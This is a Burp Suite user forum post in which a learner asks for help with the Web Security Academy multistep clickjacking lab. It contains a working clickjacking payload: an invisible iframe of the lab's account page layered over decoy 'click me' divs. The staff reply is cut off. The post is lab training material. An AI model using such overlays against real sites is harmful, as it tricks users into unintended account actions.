The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Issue in solving Multistep Clickjacking

kashish | Last updated: Jan 31, 2022 12:39PM UTC

values , as the 'click me' div elements line up with the buttons that need to be clicked but it's still not getting solved. Below is the code. Please help me on this. <style> iframe { position:relative; width: 500px; height: 700px; opacity: 0.0001; z-index: 2; } .firstClick, .secondClick { position:absolute; top: 495px; left: 50px; z-index: 1; } .secondClick { top: 415px; left: 60px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://acc51fcc1e4f7b9bc096a993003f00bd.web-security-academy.net/my-account"></iframe>

Ben, PortSwigger Agent | Last updated: Jan 31, 2022 06:48PM UTC